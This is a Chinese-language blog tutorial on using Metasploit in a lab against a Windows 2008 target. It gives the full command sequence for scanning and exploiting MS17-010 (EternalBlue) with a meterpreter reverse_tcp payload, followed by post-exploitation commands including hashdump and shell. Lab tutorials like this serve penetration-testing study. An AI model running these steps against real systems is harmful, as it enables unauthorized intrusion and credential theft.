msf进入windows2008

相关环境  攻击机kali   靶机windows2008

 

metasploit模块简介

Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持

Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码

Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统

Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截


开始

开启数据库:service postgresql start
初始化msf数据库:msfdb init
开启MSF:msfconsole
查看数据连接状态:db_status
根据名称搜索 : search ms17_010
设置模块:use auxiliary/scanner/smb/smb_ms17_010 (也可用 use 3 进行设置)

options查看选项


扫描靶机 msf > use auxiliary/scanner/smb/smb_ms17_010
options
设置目标地址:set RHOSTS 192.168.174.1
设置目标地址:set RPORT 445
扫描 run/exploit (+表示可行)

攻击靶机 use exploit/windows/smb/ms17_010_eternalblue
options
设置目标地址:set RHOSTS 192.168.174.1
设置目标地址:set RPORT 445

选择payload set payload windows/x64/meterpreter/reverse_tcp
options
设置本地地址:set LHOST 192.168.174.23

攻击 run/exploit


进入后相关命令
查看用户权限: meterpreter> getuid

获取hash密码: meterpreter> hashdump

上传文件: meterpreter> upload

执行文件: meterpreter> execute -f notepad.exe

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

简单好用的帮助指令
help/? 帮助菜单
exit 退出MSF控制台
Back 返回上一级
info 显示一个或者多个模块的信息

show 显示所给类型的模块

background 将当前操作在后台运行

use 使用所选择的模块
set 设置选项

unset 取消设置的选项
session 会话

posted @ 2022-10-08 19:46  回忆一下  阅读(66)  评论(0)    收藏  举报